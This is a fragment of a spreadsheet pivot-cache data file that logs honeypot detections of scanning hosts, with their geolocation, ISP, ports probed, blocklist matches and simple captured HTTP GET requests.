    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:857e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2015"/>
    <x v="2015"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T09:11:07"/>
    <d v="2023-12-05T10:58:00"/>
    <d v="2025-04-13T09:11:07"/>
    <n v="226"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;389&amp;&amp;46207&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="61"/>
    <s v="Trabzon"/>
    <s v="Ortahisar"/>
    <s v="Trabzon"/>
    <s v="738648"/>
    <s v="NA"/>
    <s v="41.0027"/>
    <s v="39.7168"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4ebb:2bdb"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2016"/>
    <x v="2016"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T08:31:41"/>
    <d v="2025-04-04T19:26:49"/>
    <d v="2025-04-13T08:31:41"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H43"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="20"/>
    <s v="Denizli"/>
    <s v="NA"/>
    <s v="Denizli"/>
    <s v="317109"/>
    <s v="NA"/>
    <s v="37.7742"/>
    <s v="29.0875"/>
    <s v="47524"/>
    <s v="Turksat Uydu Haberlesme ve Kablo TV Isletme A.S."/>
    <s v="TURKSAT Cable Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2012-03-08"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1885:ca69"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2017"/>
    <x v="2017"/>
    <s v="3313C8c3.skybroadband.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T08:10:30"/>
    <d v="2025-04-02T07:00:51"/>
    <d v="2025-04-13T08:10:30"/>
    <n v="30"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London (Shadwell)"/>
    <s v="2643741"/>
    <s v="E1"/>
    <s v="51.5181"/>
    <s v="-0.0714189"/>
    <s v="5607"/>
    <s v="Sky UK Limited"/>
    <s v="Sky UK Limited"/>
    <s v="residential"/>
    <s v="Sky Broadband"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3313:c8c3"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2018"/>
    <x v="2018"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T07:43:09"/>
    <d v="2025-04-13T07:43:09"/>
    <d v="2025-04-13T07:43:09"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:6d44"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2019"/>
    <x v="2019"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T07:15:58"/>
    <d v="2025-04-13T07:12:00"/>
    <d v="2025-04-13T07:15:58"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Đống Đa District"/>
    <s v="Ô Chợ Dừa"/>
    <s v="12808881"/>
    <s v="NA"/>
    <s v="21.0215"/>
    <s v="105.825"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="Vietnam Internet Network Information Center"/>
    <s v="2011-02-10"/>
    <s v="FPTDYNAMICIP-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2a72:79e2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2020"/>
    <x v="2020"/>
    <s v="125-228-181-148.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T07:11:34"/>
    <d v="2024-03-30T17:00:53"/>
    <d v="2025-04-13T07:11:34"/>
    <n v="285"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H19&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;32377&amp;&amp;80&amp;&amp;36053&amp;&amp;36040&amp;&amp;35998&amp;&amp;36067&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:b594"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2021"/>
    <x v="2021"/>
    <s v="125-228-113-126.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T07:11:18"/>
    <d v="2023-10-11T00:02:00"/>
    <d v="2025-04-13T07:11:18"/>
    <n v="500"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H40&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;abuseipdb"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;61882&amp;&amp;80&amp;&amp;23&amp;&amp;31815&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NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:717e"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2022"/>
    <x v="2022"/>
    <s v="NA&amp;&amp;59-126-120-179.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-13T07:10:37"/>
    <d v="2024-04-03T10:07:00"/>
    <d v="2025-04-13T07:10:37"/>
    <n v="425"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="80&amp;&amp;23&amp;&amp;5692&amp;&amp;48309&amp;&amp;48321&amp;&amp;48333&amp;&amp;48348&amp;&amp;48367&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NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:78b3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2023"/>
    <x v="2023"/>
    <s v="NA&amp;&amp;114-35-31-234.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-13T07:10:28"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-13T07:10:28"/>
    <n v="381"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;34821&amp;&amp;NA&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:1fea"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2024"/>
    <x v="2024"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T06:56:22"/>
    <d v="2025-04-13T03:54:21"/>
    <d v="2025-04-13T06:56:22"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>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2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:a84a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2025"/>
    <x v="2025"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T06:49:45"/>
    <d v="2025-04-12T13:05:55"/>
    <d v="2025-04-13T06:49:45"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7360:5f92"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2026"/>
    <x v="2026"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T06:22:30"/>
    <d v="2025-03-31T20:04:38"/>
    <d v="2025-04-13T06:22:30"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="cellular"/>
    <s v="Wimax Project"/>
    <s v="2007-08-01"/>
    <s v="WiMAX-BB"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:46ed"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2027"/>
    <x v="2027"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T06:13:06"/>
    <d v="2024-12-23T11:34:19"/>
    <d v="2025-04-13T06:13:06"/>
    <n v="68"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23&amp;&amp;NA&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="49"/>
    <s v="Jeju-do"/>
    <s v="Jeju-si"/>
    <s v="Jeju-si (Ayeon-ro)"/>
    <s v="1846261"/>
    <s v="63142"/>
    <s v="33.4748"/>
    <s v="126.512"/>
    <s v="9946"/>
    <s v="KCTV JEJU BROADCASTING"/>
    <s v="Kctv Jeju Broadcasting"/>
    <s v="residential"/>
    <s v="Cablenet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
